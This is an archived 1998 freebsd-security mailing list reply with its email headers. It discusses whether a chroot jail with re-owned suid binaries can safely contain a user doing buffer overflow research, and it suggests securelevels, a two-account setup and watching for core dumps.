From owner-freebsd-security Fri Dec 18 09:22:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA02607 for freebsd-security-outgoing; Fri, 18 Dec 1998 09:22:02 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dragon.acadiau.ca (dragon.acadiau.ca [131.162.1.79]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA02600 for ; Fri, 18 Dec 1998 09:22:00 -0800 (PST) (envelope-from 026809r@dragon.acadiau.ca) Received: from dragon (dragon [131.162.1.79]) by dragon.acadiau.ca (8.8.5/8.8.5) with ESMTP id NAA14050; Fri, 18 Dec 1998 13:21:03 -0400 (AST) Date: Fri, 18 Dec 1998 13:21:03 -0400 (AST) From: Michael Richards <026809r@acadiau.ca> X-Sender: 026809r@dragon To: Marco Molteni cc: Guido Stepken , freebsd-security@FreeBSD.ORG Subject: Re: A better explanation (was: buffer overflows and chroot) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi. > So my idea/question is: if I build a chroot jail for Bob, fitted with all > he needs (eg /bin, /usr/bin, /usr/local/bin, /usr/libexec, etc) and I > replace all the suid root binaries with suid root2 binaries, where root2 > is a normal user, he can do his experiments, but he can't get root. As I recall, there are a number of ways to escape from a chroot jail. I think you should be reasonably safe with the standard binaries installed. You might want to run at a higher securelevel. If the point here is academic research into an automatic buffer overflow program, just give him 2 accounts and let him fiddle with exploiting from one userlevel to the other via a suid program. Seeing suid programs core dumping can be an indication that something funky is going on, but if he gets the overflow right on the first try, of course it won't core dump :0 -Michael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message